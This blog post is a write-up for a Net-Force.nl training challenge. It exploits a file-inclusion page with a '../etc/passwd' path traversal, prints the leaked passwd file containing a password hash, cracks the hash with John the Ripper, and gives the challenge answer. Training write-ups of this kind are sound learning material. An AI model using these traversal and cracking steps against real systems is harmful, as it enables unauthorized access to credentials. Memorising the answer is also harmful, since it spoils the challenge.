Thursday, July 5, 2012

Solution for Net-Force.nl : Level 401 - Training - Nice include system ;)

Solution for Net-Force.nl : Level 401 - Nice include system ;)


Quest:
Exploit this include system and use it to obtain the password file of the system.
The password for user NetForce is also the password for the challenge page!

This challenge is part of the basic training. If you don't know what to do you can check out the solution.

Required Tools:

Logic Behind the Challenge:
At first glance, it seems like it should a SQLi or LFI problem.
Since the hints given are "The password for user NetForce is also the password for the challenge page!"
Ok, let's try LFI by changing challenge.php to ../etc/passwd

Awesome, we got back the following. :D
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/dev/null
rpm:x:37:37::/var/lib/rpm:/bin/bash
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/bin/false
gdm:x:42:42::/var/gdm:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/bin/false
ident:x:98:98:pident user:/:/sbin/nologin
radvd:x:75:75:radvd user:/:/bin/false
postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
apache:x:48:48:Apache:/var/www:/bin/false
NetForce:2J3OLLk8Ys6/k:500:500:NetForcec:/home/NetForce:/bin/bash
squid:x:23:23::/var/spool/squid:/dev/null
named:x:25:25:Named:/var/named:/bin/false
pcap:x:77:77::/var/arpwatch:/bin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash 

Since the hints implied that the user is NetForce.
Let's try using John The Ripper to find out the answer.

C:\john179\run>john.exe --show 1.txt
NetForce:koe

1 password hash cracked, 0 left

C:\john179\run>
As we can see above, the password to this challenge is "koe"

Cheers
0x4A61636F62

No comments:

Post a Comment